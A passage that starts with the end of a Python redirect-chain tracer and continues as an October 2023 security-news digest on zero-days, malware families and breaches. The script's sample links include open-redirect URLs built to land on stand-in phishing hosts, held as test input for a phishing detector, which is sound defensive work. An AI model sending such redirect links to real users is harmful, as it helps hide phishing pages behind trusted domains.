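              "%3Fnext%3Dhttps%253A%252F%252Fpay.evil.test%252Flogin",
    # same-site redirect, benign
    "internal": "https://jobs.example.com/r?url=https%3A%2F%2Fwww.jobs.example.com%2Fhome",
    # double-encoded target
    "double": "https://a.example/r?u=https%253A%252F%252Fb.evil.test%252F",
    # no redirect at all
    "plain": "https://www.example.com/account?id=42",
}

if __name__ == "__main__":
    for name, link in SAMPLE_LINKS.items():
        print(f"{name:9s} {' -> '.join(redirect_chain(link))}")
```

The output is the chain of hosts, so a mail filter can show the recipient (or an analyst) that a link on a well-known domain ends on a host they have never heard of, which is exactly the signal the trusted domain was chosen to hide. The suffix-based same-site check is deliberately simple; it will treat `evil.example.co.uk` and `example.co.uk` as one site, so swap in a public suffix list before using it at scale.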


            Revealed! The top 10 cybersecurity misconfigurations, as determined by CISA and the NSA

            ciber
            2023-10-06 https://www.tripwire.com/state-of-security/revealed-top-10-cybersecurity-misconfigurations-determined-cisa-and-nsa
            A joint advisory from the United States’ National Security Agency (NSA) and Cybersecurity and Infrastructure Security Agency (CISA) has shone a light on the top ten most common cybersecurity misconfigurations found in large private and public organisations. Read more in my article on the Tripwire State of Security blog. "

            Autosummary: The ten misconfigurations are: default configurations of software and applications; improper separation of user/administrator privilege; insufficient internal network monitoring; lack of network segmentation; poor patch management; bypass of system access controls; weak or misconfigured multifactor authentication (MFA) methods; insufficient access control lists (ACLs) on network shares and services; poor credential hygiene; and unrestricted code execution. There’s no doubt that problems like these are present in many organisations, both private and public sector. "


            DinodasRAT used against governmental entity in Guayana – Week in security with Tony Anscombe

            government
            2023-10-06 https://www.welivesecurity.com/en/videos/dinodasrat-used-governmental-entity-guayana-week-security-tony-anscombe/
            The backdoor can exfiltrate files, manipulate Windows registry keys, and execute commands that are capable of performing various actions on a victim’s machine "

            Autosummary: "


            Soft skills continue to challenge the cybersecurity sector

            ransomware ciber
            2023-10-05 https://www.helpnetsecurity.com/2023/10/05/soft-skills-cybersecurity-sector/

            New cybersecurity findings pinpoint areas where cybersecurity experts are lacking, with interpersonal skills, cloud computing, and security measures standing out as the most prominent skill deficiencies in cybersecurity specialists, according to a new ISACA report. 59 percent of cybersecurity leaders say their teams are understaffed. 50 percent of respondents indicated job openings for non-entry-level roles, compared to 21 percent with job openings for entry-level positions. Cybersecurity talent retention struggles persist Strides have been made in … More

            The post Soft skills continue to challenge the cybersecurity sector appeared first on Help Net Security.

            "

            Autosummary: DevSecOps (36 percent) When looking at soft skills, communication (58 percent), critical thinking (54 percent), problem-solving (49 percent), teamwork (45 percent), and attention to detail (36 percent) come in as the top five skills employers are seeking in cybersecurity job candidates. "


            Apple Rolls Out Security Patches for Actively Exploited iOS Zero-Day Flaw

            exploits
            2023-10-05 https://thehackernews.com/2023/10/apple-rolls-out-security-patches-for.html
            Apple on Wednesday rolled out security patches to address a new zero-day flaw in iOS and iPadOS that it said has come under active exploitation in the wild. Tracked as CVE-2023-42824, the kernel vulnerability could be abused by a local attacker to elevate their privileges. The iPhone maker said it addressed the problem with improved checks. "Apple is aware of a report that this issue may have "

            Autosummary: "


            Atlassian Confluence Hit by New Actively Exploited Zero-Day – Patch Now

            exploits
            2023-10-05 https://thehackernews.com/2023/10/atlassian-confluence-hit-by-newly.html
            Atlassian has released fixes to contain an actively exploited critical zero-day flaw impacting publicly accessible Confluence Data Center and Server instances. The vulnerability, tracked as CVE-2023-22515, is remotely exploitable and allows external attackers to create unauthorized Confluence administrator accounts and access Confluence servers. It does not impact Confluence versions prior to "

            Autosummary: "


            Eyes everywhere: How to safely navigate the IoT video revolution

            industry
            2023-10-05 https://www.helpnetsecurity.com/2023/10/05/connected-devices-cameras/

            Cameras are coming to a connected device near you. Cheap image sensors from old mobile phones are flooding the market and bringing video to the Internet of Things (IoT). Vacuum cleaners, bird feeders, connected cars and even smart ovens now come loaded with cameras that recognize the dish and suggest remaining cooking times. This is a major shift in the functionality of connected devices, which now number more than 15 million globally. At the same … More

            The post Eyes everywhere: How to safely navigate the IoT video revolution appeared first on Help Net Security.

            "

            Autosummary: To navigate this evolution, device creators must ensure safety, and users should customize, decentralize, and prioritize trusted brands. Moreover, these connections are encrypted to ensure that data is authenticated, confidential, and uncompromised. Vacuum cleaners, bird feeders, connected cars and even smart ovens now come loaded with cameras that recognize the dish and suggest remaining cooking times. "


            CISA Warns of Active Exploitation of JetBrains and Windows Vulnerabilities

            exploits
            2023-10-05 https://thehackernews.com/2023/10/cisa-warns-of-active-exploitation-of.html
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added two security flaws to its Known Exploited Vulnerabilities (KEV) catalog due to active exploitation, while removing five bugs from the list due to lack of adequate evidence. The vulnerabilities newly added are below - CVE-2023-42793 (CVSS score: 9.8) - JetBrains TeamCity Authentication Bypass Vulnerability "

            Autosummary: "


            “Looney Tunables” bug allows root access on Linux distros (CVE-2023-4911)

            exploits Linux
            2023-10-05 https://www.helpnetsecurity.com/2023/10/05/cve-2023-4911/

            A vulnerability (CVE-2023-4911) in the GNU C Library (aka “glibc”) can be exploited by attackers to gain root privileges on many popular Linux distributions, according to Qualys researchers. About CVE-2023-4911 Dubbed “Looney Tunables”, CVE-2023-4911 is a buffer overflow vulnerability in the dynamic loader’s processing of the GLIBC_TUNABLES environment variable. To exploit it, attackers first need to establish access to the system. “The GNU C Library, commonly known as glibc, is the C library in the … More

            The post “Looney Tunables” bug allows root access on Linux distros (CVE-2023-4911) appeared first on Help Net Security.

            "

            Autosummary: "


            Apple patches another iOS zero-day under attack (CVE-2023-42824)

            exploits
            2023-10-05 https://www.helpnetsecurity.com/2023/10/05/cve-2023-42824/

            Apple has released a security update for iOS and iPadOS to fix another zero-day vulnerability (CVE-2023-42824) exploited in the wild. About CVE-2023-42824 CVE-2023-42824 is a kernel vulnerability that could allow a local threat actor to elevate its privileges on affected iPhones and iPads. “Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.6,” the company stated. The vulnerability affects the following devices: iPhone XS … More

            The post Apple patches another iOS zero-day under attack (CVE-2023-42824) appeared first on Help Net Security.

            "

            Autosummary: "


            Critical Atlassian Confluence zero-day exploited by attackers (CVE-2023-22515)

            exploits
            2023-10-05 https://www.helpnetsecurity.com/2023/10/05/cve-2023-22515/

            Atlassian has fixed a critical zero-day vulnerability (CVE-2023-22515) in Confluence Data Center and Server that is being exploited in the wild. “Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances,” the company said. About CVE-2023-22515 Atlassian describes CVE-2023-22515 as a critical … More

            The post Critical Atlassian Confluence zero-day exploited by attackers (CVE-2023-22515) appeared first on Help Net Security.

            "

            Autosummary: "


            Analysis and Config Extraction of Lu0Bot, a Node.js Malware with Considerable Capabilities

            exploits
            2023-10-05 https://thehackernews.com/2023/10/analysis-and-config-extraction-of.html
            Nowadays, more malware developers are using unconventional programming languages to bypass advanced detection systems. The Node.js malware Lu0Bot is a testament to this trend. By targeting a platform-agnostic runtime environment common in modern web apps and employing multi-layer obfuscation, Lu0Bot is a serious threat to organizations and individuals. Although currently, the malware has low "

            Autosummary: Technical analysis of Lu0Bot malware using a disassembler and debugger. To access the main JS code, the team: unpacked the SFX archive; ran a command to collect the Node.js file; launched fjlpexyjauf.exe in x32dbg, entering the incoming data into the command line; got to the point where JS code execution started; and located the code in memory and saved a dump. To see how the unpacking and dump extraction processes were conducted, refer to the original article. Debugging the JavaScript code: the team used Node.js with its --inspect-brk parameter (node.exe --inspect-brk *obfuscated dump without garbage bytes*), placing a breakpoint on the "var" keyword and observing the output generated by each line. The lknidtnqmg.dat file had encrypted bytes in Base64, which could be decrypted using the given input number. "


            Guyana Governmental Entity Hit by DinodasRAT in Cyber Espionage Attack

            government
            2023-10-05 https://thehackernews.com/2023/10/guyana-governmental-entity-hit-by.html
            A governmental entity in Guyana has been targeted as part of a cyber espionage campaign dubbed Operation Jacana. The activity, which was detected by ESET in February 2023, entailed a spear-phishing attack that led to the deployment of a hitherto undocumented implant written in C++ called DinodasRAT. The Slovak cybersecurity firm said it could link the intrusion to a known threat actor or group, "

            Autosummary: "


            GoldDigger Android Trojan Targets Banking Apps in Asia Pacific Countries

            financial exploits
            2023-10-05 https://thehackernews.com/2023/10/golddigger-android-trojan-targets.html
            A new Android banking trojan named GoldDigger has been found targeting several financial applications with an aim to siphon victims’ funds and backdoor infected devices. "The malware targets more than 50 Vietnamese banking, e-wallet and crypto wallet applications," Group-IB said. "There are indications that this threat might be poised to extend its reach across the wider APAC region and to "

            Autosummary: "


            Lyca Mobile investigates customer data leak after cyberattack

            ciber
            2023-10-05 https://www.bleepingcomputer.com/news/security/lyca-mobile-investigates-customer-data-leak-after-cyberattack/
            Lyca Mobile has released a statement about an unexpected disruption on its network caused by a cyberattack that may have also compromised customer data. [...] "

            Autosummary: The British company provides mobile telecommunications and voice over IP (VoIP) services in 60 countries, including the United States, the U.K., Germany, Australia, France, Italy, and the Netherlands. "


            Exploits released for Linux flaw giving root on major distros

            exploits Linux
            2023-10-05 https://www.bleepingcomputer.com/news/security/exploits-released-for-linux-flaw-giving-root-on-major-distros/
            Proof-of-concept exploits have already surfaced online for a high-severity flaw in GNU C Library’s dynamic loader, allowing local attackers to gain root privileges on major Linux distributions. [...] "

            Autosummary: "


            NSA and CISA reveal top 10 cybersecurity misconfigurations

            ciber
            2023-10-05 https://www.bleepingcomputer.com/news/security/nsa-and-cisa-reveal-top-10-cybersecurity-misconfigurations/
            The National Security Agency (NSA) and the Cybersecurity and Infrastructure Security Agency (CISA) revealed today the top ten most common cybersecurity misconfigurations discovered by their red and blue teams in the networks of large organizations. [...] "

            Autosummary: Mitigations that would have this effect include: eliminating default credentials and hardening configurations, deactivating unused services and implementing stringent access controls, ensuring regular updates and automating the patching process, giving priority to patching known vulnerabilities that have been exploited, and reducing, restricting, auditing, and closely monitoring administrative accounts and privileges. "


            2023 MITRE ATT&CK® Evaluation results: Malwarebytes earns high marks for detection, blocks initial malware executions

            exploits
            2023-10-05 https://www.malwarebytes.com/blog/business/2023/10/2023-mitre-attck-evaluation-results-malwarebytes-blocks-all-malicious-executions-earns-high-marks-for-detection

            Categories: Business

            MITRE Engenuity released its 2023 ATT&CK Evaluation results, with Malwarebytes blocking initial malware execution and earning high marks for detection.


            The post 2023 MITRE ATT&CK® Evaluation results: Malwarebytes earns high marks for detection, blocks initial malware executions appeared first on Malwarebytes Labs.


            Autosummary: In sum, while the MITRE ATT&CK Evaluation is undoubtedly important, its results are best considered alongside other independent tests such as MRG Effitas 360° Assessment & Certification, G2 peer-to-peer evaluations, AV-Test, and more. "


            Sony was attacked by two ransomware operators

            exploits ransomware
            2023-10-05 https://www.malwarebytes.com/blog/news/2023/10/sony-attacked-by-two-ransomware-operators

            Categories: Business

            Categories: News

            Categories: Ransomware

            Tags: Sony

            Tags: RansomedVC

            Tags: Cl0p

            Tags: ransomware

            Tags: data breach

            Tags: MOVEit

            Sony has confirmed a ransomware attack in June and is investigating claims of a second, more recent one.


            The post Sony was attacked by two ransomware operators appeared first on Malwarebytes Labs.


            Autosummary: The disputed dataset contained details for the SonarQube platform, certificates, Creators Cloud, incident response policies, a device emulator for generating licenses, and more. Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. While the FBI has warned of multiple ransomware attacks on the same victim, neither of these ransomware groups is on its list of ransomware variants used in these double attacks, so it is doubtful that this was the play here. "


            Cybersecurity preparedness pays big dividends for businesses

            ciber
            2023-10-04 https://www.helpnetsecurity.com/2023/10/04/businesses-cybersecurity-preparedness/

            Businesses are taking cybersecurity more seriously by boosting resources and preparedness, according to GetApp. US businesses on the whole are gaining ground against cybercriminals after several years of increasingly severe threats, but the Las Vegas cyberattacks are a stark reminder of the cost of a breach. GetApp’s report reveals that the ransomware rate remains alarmingly high at 37%, despite meaningful improvements over the last year. While there is still work to be done, increased investments … More

            The post Cybersecurity preparedness pays big dividends for businesses appeared first on Help Net Security.


            Autosummary: Phishing effectiveness has cooled from last year’s critical high: 80% of businesses report receiving phishing emails this year (from 89% in 2022), and 61% say their employees clicked on a malicious link (from 81% in 2022). "


            Looney Tunables: New Linux Flaw Enables Privilege Escalation on Major Distributions

            Linux
            2023-10-04 https://thehackernews.com/2023/10/looney-tunables-new-linux-flaw-enables.html
            A new Linux security vulnerability dubbed Looney Tunables has been discovered in the GNU C library's ld.so dynamic loader that, if successfully exploited, could lead to a local privilege escalation and allow a threat actor to gain root privileges. Tracked as CVE-2023-4911 (CVSS score: 7.8), the issue is a buffer overflow that resides in the dynamic loader's processing of the GLIBC_TUNABLES "



            Phishing campaign targeted US executives exploiting a flaw in Indeed job search platform

            financial exploits
            2023-10-04 https://securityaffairs.com/151897/cyber-crime/phishing-campaign-indeed-flaw.html

            Threat actors exploited an open redirection vulnerability in the job search platform Indeed to carry out phishing attacks. Researchers from the cybersecurity firm Menlo Security reported that threat actors exploited an open redirection vulnerability in the job search platform Indeed in phishing attacks. The phishing attacks were aimed at senior executives across various industries, primarily […]

            The post Phishing campaign targeted US executives exploiting a flaw in Indeed job search platform appeared first on Security Affairs.


            Autosummary: Phishing campaign targeted US executives exploiting a flaw in Indeed job search platform. Pierluigi Paganini, October 04, 2023. Threat actors exploited an open redirection vulnerability in the job search platform Indeed to carry out phishing attacks. "


            Sony confirms data breach impacting thousands in the U.S.

            financial
            2023-10-04 https://www.bleepingcomputer.com/news/security/sony-confirms-data-breach-impacting-thousands-in-the-us/
            Sony Interactive Entertainment (Sony) has notified current and former employees and their family members about a cybersecurity breach that exposed personal information. [...] "

            Autosummary: The leaked dataset, which at least two separate threat actors held, contained details for the SonarQube platform, certificates, Creators Cloud, incident response policies, a device emulator for generating licenses, and more. "


            Qualcomm patches 3 actively exploited zero-days

            exploits
            2023-10-04 https://www.helpnetsecurity.com/2023/10/04/qualcomm-vulnerabilities-exploited/

            Qualcomm has fixed three actively exploited vulnerabilities (CVE-2023-33106, CVE-2023-33107, CVE-2023-33063) in its Adreno GPU and Compute DSP drivers. Vulnerabilities exploited in Qualcomm GPU and DSP drivers The US-based semiconductor company has been notified by Google Threat Analysis Group and Google Project Zero that CVE-2023-33106, CVE-2023-33107, CVE-2023-33063, and CVE-2022-22071 “may be under limited, targeted exploitation”. CVE-2022-22071 is an older use-after-free vulnerability found in Automotive Android OS and patched in May 2022. Additional information about the three … More

            The post Qualcomm patches 3 actively exploited zero-days appeared first on Help Net Security.




            Atlassian patches critical Confluence zero-day exploited in attacks

            exploits
            2023-10-04 https://www.bleepingcomputer.com/news/security/atlassian-patches-critical-confluence-zero-day-exploited-in-attacks/
            Australian software company Atlassian released emergency security updates to fix a maximum severity zero-day vulnerability in its Confluence Data Center and Server software, which has been exploited in attacks. [...] "



            Researchers warn of 100,000 industrial control systems exposed online

            industry
            2023-10-04 https://www.bleepingcomputer.com/news/security/researchers-warn-of-100-000-industrial-control-systems-exposed-online/
            About 100,000 industrial control systems (ICS) were found on the public web, exposed to attackers probing them for vulnerabilities and at risk of unauthorized access. Among them are power grids, traffic light systems, security and water systems. [...] "

            Autosummary: The most exposed countries, in terms of how many organizations have at least one exposed ICS, are: United States, Canada, Italy, United Kingdom, France, Netherlands, Germany, Spain, Poland, Sweden. (Figure caption: Global exposure of ICSs (BitSight)) "


            Enhancing your application security program with continuous monitoring

            ransomware
            2023-10-04 https://www.bleepingcomputer.com/news/security/enhancing-your-application-security-program-with-continuous-monitoring/
            Pen Testing as a Service and traditional web application pen testing offer two different approaches to securing your applications. Learn more from Outpost24 on which approach may be best for your business. [...] "

            Autosummary: But with the increase in zero-day vulnerabilities, polymorphic malware, and Advanced Persistent Threats (APTs), there’s an argument for more frequent, even continuous, cybersecurity evaluations. Embracing the continuous monitoring approach across the board: beyond securing web applications, innovations like Endpoint Attack Surface Management (EASM) and Risk-Based Vulnerability Management (RBVM) have emerged as game changers for elevating an organization’s cybersecurity posture. Traditional web application pen testing vs. pen testing as a service: point-in-time assessments are like snapshots taken at a particular instant in time. "


            Nutanix strengthens cyber resilience with ransomware detection and recovery features

            exploits ransomware
            2023-10-04 https://www.helpnetsecurity.com/2023/10/04/nutanix-data-lens/

            Nutanix announced new features in the Nutanix Cloud Platform to strengthen organizations’ cyber resilience against ransomware attacks on unstructured data. These new features, available in Nutanix Data Lens and Nutanix Unified Storage solutions, enable organizations to detect a threat, defend from further damage and begin a 1-click recovery process within 20 minutes of exposure. The features build on the strength of Nutanix Cloud Platform to protect and secure customers’ most sensitive data across clouds. Ransomware … More

            The post Nutanix strengthens cyber resilience with ransomware detection and recovery features appeared first on Help Net Security.


            Autosummary: “Understanding access to our data is very important for us to ensure data is secure, safe, and being used properly,” said Robert Pohjanen, IT Architect, LKAB. “Many organizations struggle with managing data protection across storage silos and clouds, especially when it comes to data governance and security,” said Thomas Cornely, SVP, Product Management at Nutanix. "


            Apple emergency update fixes new zero-day used to hack iPhones

            exploits
            2023-10-04 https://www.bleepingcomputer.com/news/apple/apple-emergency-update-fixes-new-zero-day-used-to-hack-iphones/
            Apple released emergency security updates to patch a new zero-day security flaw exploited in attacks targeting iPhone and iPad users. [...] "



            Update your Android devices now! Google patches two actively exploited vulnerabilities

            exploits
            2023-10-04 https://www.malwarebytes.com/blog/news/2023/10/update-your-android-devices-now-google-patches-two-actively-exploited-vulnerabilities

            Categories: Android

            Categories: News

            Tags: Google

            Tags: Android

            Tags: Qualcomm

            Tags: webp

            Tags: ARM Mali

            Tags: cve-2023-4863

            Tags: cve-2023-4211

            Tags: cve-2023-33106

            Tags: cve-2023-33107

            Tags: cve-2023-22071

            Tags: cve-2023-33063

            Tags: 2023-10-006

            Tags: patch level

            Google has patched 53 vulnerabilities in its Android October security updates, two of which are known to be actively exploited.


            The post Update your Android devices now! Google patches two actively exploited vulnerabilities appeared first on Malwarebytes Labs.


            Autosummary: In its own October security bulletin, chip manufacturer Qualcomm said that there are indications from Google Threat Analysis Group and Google Project Zero that CVE-2023-33106, CVE-2023-33107, CVE-2022-22071, and CVE-2023-33063 may be under limited, targeted exploitation. This vulnerability affects multiple versions of Arm Mali GPU drivers which are used in a broad range of Android device models, including on Android phones developed by Google, Samsung, Huawei, and Xiaomi, as well as in some Linux devices. "


            Gen Z fears physical violence from being online more than anyone else, Malwarebytes finds

            exploits
            2023-10-04 https://www.malwarebytes.com/blog/news/2023/10/gen-z-fears-physical-violence-from-being-online-more-than-anyone-else-malwarebytes-finds

            Categories: News

            Gen Z fears violence. Adults fear identity theft. And only about one-third of everyone is using antivirus. These are the cybersecurity and online privacy findings in Malwarebytes' latest research.


            The post Gen Z fears physical violence from being online more than anyone else, Malwarebytes finds appeared first on Malwarebytes Labs.


            Autosummary: By polling 1,000 internet users aged 13 – 77 in North America, Malwarebytes can now reveal, across all age groups and not just for Gen Z: the 10 biggest concerns of going online, including hacked financial accounts, identity theft, and malware. The “version history” of the internet was split by what we could do online: simple browsing across Web 1.0’s static web pages, instant connection throughout Web 2.0’s social platforms, and, into the future, potential new forms of ownership within Web 3.0’s dreams of decentralization. "


            Evolving conversations: Cybersecurity as a business risk

            ciber
            2023-10-03 https://www.helpnetsecurity.com/2023/10/03/ciso-board-relationship/

            Board members often lack technical expertise and may not fully grasp cyber risks. On the other hand, CISOs are more accustomed to interfacing with IT staff. This is understandable; the board is responsible for guiding high-level decision-making. They rarely become involved with the details, leaving implementation plans and technical audits for the CISO to handle. The solution is effectively integrating the CISO into the C-suite and forming a collaborative relationship with the board. By using … More

            The post Evolving conversations: Cybersecurity as a business risk appeared first on Help Net Security.


            Autosummary: By tying security programs to concrete goals across risk, CX, growth, compliance, and resilience, organizations can shift perspectives and unlock additional resources. Armed with the right information, it is up to the CISO to bring the board members to the same page when it comes to securing their organizations and being prepared for the worst-case scenario, while also translating cybersecurity measures into drivers towards meeting business outcomes and maximizing the organization’s impact. Making cybersecurity part of the business growth strategy: cybersecurity has evolved as threats have evolved, with new tools at attackers’ disposal such as FraudGPT, EvilGPT, and WormGPT. "


            Arm Issues Patch for Mali GPU Kernel Driver Vulnerability Amidst Ongoing Exploitation

            exploits Linux
            2023-10-03 https://thehackernews.com/2023/10/arm-issues-patch-for-mali-gpu-kernel.html
            Arm has released security patches to contain a security flaw in the Mali GPU Kernel Driver that has come under active exploitation in the wild. Tracked as CVE-2023-4211, the shortcoming impacts the following driver versions: Midgard GPU Kernel Driver: all versions from r12p0 - r32p0; Bifrost GPU Kernel Driver: all versions from r0p0 - r42p0; Valhall GPU Kernel Driver: all versions from r19p0 - "



            Zero-day in Arm GPU drivers exploited in targeted attacks (CVE-2023-4211)

            exploits
            2023-10-03 https://www.helpnetsecurity.com/2023/10/03/cve-2023-4211/

            A vulnerability (CVE-2023-4211) in the kernel drivers for several Mali GPUs “may be under limited, targeted exploitation,” British semiconductor manufacturer Arm confirmed on Monday, when it released drivers updated with patches. Arm’s Mali GPUs are used on a variety of devices, most prominently on Android phones by Google, Samsung, Huawei, Nokia, Xiaomi, Oppo, and other manufacturers. About CVE-2023-4211: CVE-2023-4211 stems from improper GPU memory processing and allows a local non-privileged user to gain access to already … More

            The post Zero-day in Arm GPU drivers exploited in targeted attacks (CVE-2023-4211) appeared first on Help Net Security.




            Qualcomm says hackers exploit 3 zero-days in its GPU, DSP drivers

            exploits
            2023-10-03 https://www.bleepingcomputer.com/news/security/qualcomm-says-hackers-exploit-3-zero-days-in-its-gpu-dsp-drivers/
            Qualcomm is warning of three zero-day vulnerabilities in its GPU and Compute DSP drivers that hackers are actively exploiting in attacks. [...] "

            Autosummary: "Patches for the issues affecting Adreno GPU and Compute DSP drivers have been made available, and OEMs have been notified with a strong recommendation to deploy security updates as soon as possible" – Qualcomm. The CVE-2022-22071 flaw was disclosed in May 2022 and is a high-severity (CVSS v3.1: 8.4) locally exploitable use-after-free bug impacting popular chips like the SD855, SD865 5G, and SD888 5G. Qualcomm has not released any details on the actively exploited CVE-2023-33106, CVE-2022-22071, and CVE-2023-33063 flaws and will provide more information in its December 2023 bulletin. "


            Microsoft Edge, Teams get fixes for zero-days in open-source libraries

            exploits
            2023-10-03 https://www.bleepingcomputer.com/news/microsoft/microsoft-edge-teams-get-fixes-for-zero-days-in-open-source-libraries/
            Microsoft released emergency security updates for Edge, Teams, and Skype to patch two zero-day vulnerabilities in open-source libraries used by the three products. [...] "

            Autosummary: The libwebp library is used by a large number of projects for encoding and decoding images in the WebP format, including modern web browsers like Safari, Mozilla Firefox, Microsoft Edge, Opera, and the native Android web browsers, as well as popular apps like 1Password and Signal. "


            EvilProxy uses indeed.com open redirect for Microsoft 365 phishing

            financial
            2023-10-03 https://www.bleepingcomputer.com/news/security/evilproxy-uses-indeedcom-open-redirect-for-microsoft-365-phishing/
            A recently uncovered phishing campaign is targeting Microsoft 365 accounts of key executives in U.S.-based organizations by abusing open redirects from the Indeed employment website for job listings. [...] "



            Qualcomm Releases Patch for 3 new Zero-Days Under Active Exploitation

            exploits
            2023-10-03 https://thehackernews.com/2023/10/qualcomm-releases-patch-for-3-new-zero.html
            Chipmaker Qualcomm has released security updates to address 17 vulnerabilities in various components, while warning that three other zero-days have come under active exploitation. Of the 17 flaws, three are rated Critical, 13 are rated High, and one is rated Medium in severity. "There are indications from Google Threat Analysis Group and Google Project Zero that CVE-2023-33106, CVE-2023-33107, "



            New "Looney Tunables" Linux bug gives root on major distros

            exploits Linux
            2023-10-03 https://www.bleepingcomputer.com/news/security/new-looney-tunables-linux-bug-gives-root-on-major-distros/
            A new Linux vulnerability known as "Looney Tunables" enables local attackers to gain root privileges by exploiting a buffer overflow weakness in the GNU C Library's ld.so dynamic loader. [...] "

            Autosummary: "Our successful exploitation, leading to full root privileges on major distributions like Fedora, Ubuntu, and Debian, highlights this vulnerability’s severity and widespread nature," said Saeed Abbasi, Product Manager at Qualys' Threat Research Unit. "


            Google to bolster phishing and malware delivery defenses in 2024

            financial exploits
            2023-10-03 https://www.bleepingcomputer.com/news/security/google-to-bolster-phishing-and-malware-delivery-defenses-in-2024/
            Google will introduce new sender guidelines in February to bolster email security against phishing and malware delivery by mandating bulk senders to authenticate their emails and adhere to stricter spam thresholds [...] "



            Android October security update fixes zero-days exploited in attacks

            exploits
            2023-10-03 https://www.bleepingcomputer.com/news/security/android-october-security-update-fixes-zero-days-exploited-in-attacks/
            Google has released the October 2023 security updates for Android, addressing 54 unique vulnerabilities, including two known to be actively exploited. [...] "



            BunnyLoader, a new Malware-as-a-Service advertised in cybercrime forums

            exploits
            2023-10-03 https://securityaffairs.com/151869/malware/bunnyloader-maas.html

            Cybersecurity researchers spotted a new malware-as-a-service (MaaS) called BunnyLoader that’s appeared in the threat landscape. Zscaler ThreatLabz researchers discovered a new malware-as-a-service (MaaS) that is called BunnyLoader, which has been advertised for sale in multiple cybercrime forums since September 4, 2023. The BunnyLoader malware loader is written in C/C++ and is sold on various forums for $250 for […]

            The post BunnyLoader, a new Malware-as-a-Service advertised in cybercrime forums appeared first on Security Affairs.


            Autosummary: The BunnyLoader panel supports multiple features such as: downloading and executing additional malware, keylogging, stealing credentials, manipulating a victim’s clipboard to steal cryptocurrency, running remote commands on the infected machine, providing statistics for infections, displaying the total connected/disconnected clients, monitoring active tasks, and logging the stealer’s activities. The researchers have yet to discover the distribution channel for the malware, but they analyzed the activity of the malware upon execution. "


            Exclusive: Lighting the Exfiltration Infrastructure of a LockBit Affiliate (and more)

            ransomware
            2023-10-03 https://securityaffairs.com/151862/breaking-news/exfiltration-infrastructure.html

            Researchers have identified the exfiltration infrastructure of a LockBit affiliate while investigating a LockBit extortion incident that occurred in Q3 2023. Executive Summary NOTE: This version of the report has been redacted for TLP:WHITE disclosure. Introduction Digging into ransomware infections always provides valuable insights. This time, we investigated peculiar details of a recent Lockbit-based intrusion […]

            The post Exclusive: Lighting the Exfiltration Infrastructure of a LockBit Affiliate (and more) appeared first on Security Affairs.


            Autosummary: Such servers have been deployed in 16 countries spread worldwide: Russia, Netherlands, Finland, United States, Kazakhstan, Turkey, Ukraine, Czech Republic, Latvia, Norway, Poland, Romania, Uzbekistan, Germany, France, and Greece. So, with a good degree of confidence, we are looking at multiple instances generated from the same base image, likely linked to a single organization, and the extension of this linked infrastructure involves more than 8 thousand hosts worldwide, at least a third of which are located in CIS countries. The full report containing the Indicators of Compromise (IoCs) and details on the exfiltration infrastructure is available here: https://medium.com/@lcam/lighting-the-exfiltration-infrastructure-of-a-lockbit-affiliate-and-more-f57fbb7a4e79 About the author: Luca Mella, Cyber Security Expert, Response & Threat Intel | Manager. In 2019, Luca was mentioned as one of the “32 Influential Malware Research Professionals”. In fact, since 2019, the hostname has linked a wide range of eCrime activities such as ransomware and data extortions, info-stealing malware spreading, botnet infections, and scams. "


            Two hacker groups are back in the news, LockBit 3.0 Black and BlackCat/AlphV

            ransomware
            2023-10-03 https://securityaffairs.com/151855/malware/lockbit-3-0-black-blackcat-alphv.html

            Researchers from cybersecurity firm TG Soft are warning Italian entities and companies of LockBit 3.0 Black and BlackCat/AlphV attacks. In the last few weeks, two cybercriminal groups that have also targeted Italian entities and businesses, are back in the news; they are LockBit 3.0 Black and BlackCat/AlphV, which had already been reported by the media in the first decade of […]

            The post Two hacker groups are back in the news, LockBit 3.0 Black and BlackCat/AlphV appeared first on Security Affairs.


            Autosummary: Obviously, as with any other software, its effectiveness and efficiency are subject to the 4 rules of good use: correctly INSTALLED on ALL PCs as well as on Server(s), even if they are not used for WEB browsing; correctly CONFIGURED; correctly UPDATED; and properly USED… For more info on TG Soft’s Heuristic Behavioral technologies take a look at: https://www.tgsoft.it/news/news_archivio.asp?id=1470&lang=eng Pierluigi Paganini (SecurityAffairs – hacking, Lockbit) "


            European Telecommunications Standards Institute (ETSI) suffered a data breach

            financial Telcos
            2023-10-03 https://securityaffairs.com/151845/data-breach/etsi-data-breach.html

            The European Telecommunications Standards Institute (ETSI) disclosed a data breach, threat actors had access to a database of its users. Threat actors stole a database containing the list of users of the portal of the European Telecommunications Standards Institute (ETSI). The European Telecommunications Standards Institute is an independent, not-for-profit organization based in Europe. The organization […]

            The post European Telecommunications Standards Institute (ETSI) suffered a data breach appeared first on Security Affairs.


            Autosummary: The organization focuses on developing global standards for information and communications technology (ICT) and telecommunications, such as: GSM™, TETRA, 3G, 4G, 5G, DECT™. "


            Mexico crime: Suspect held over young men's kidnapping

            latam
            2023-10-03 https://www.bbc.co.uk/news/world-latin-america-66993375?at_medium=RSS&at_campaign=KARANGA
            Prosecutors hope the arrest will shed light on the disappearance of five friends from Lagos de Moreno. "



            Playing your part in building a safer digital world: Why cybersecurity matters

            ciber
            2023-10-03 https://www.welivesecurity.com/en/cybersecurity/playing-your-part-building-safer-digital-world-why-cybersecurity-matters/
            In an increasingly complex and interconnected digital landscape, personal cybersecurity empowers you to protect your data, privacy and digital well-being "

            Autosummary: It could include: loss of access to your devices/machines (if they become compromised with malware); loss of access to your social media accounts; financial loss due to stolen card details or scams which trick you into sending money/buying fraudulently advertised items; psychological distress from suffering a breach or scam; time and money spent trying to reclaim fraudulently obtained funds; the administrative burden of regaining access and resetting account passwords across multiple accounts; physical danger, if smart home security cameras and child monitors are hijacked. The scale of some cybercrime categories is astonishing. We trust others to guard our most sensitive data: even if we secure our devices and online accounts, what happens to the personal and financial information we entrust with our insurer, healthcare organization, bank, cloud storage provider or other business? Deployed primarily in phishing messages, the end goal is usually to trick the victim into handing over their logins, personal information or card details, or getting them to click a link which could download malware to your machine or device. TVs, refrigerators, security cameras, speakers – you name the appliance and you can usually buy a version which is connected to the internet and sports a computer chip for processing data. "


            Online fraud can cost you more than money

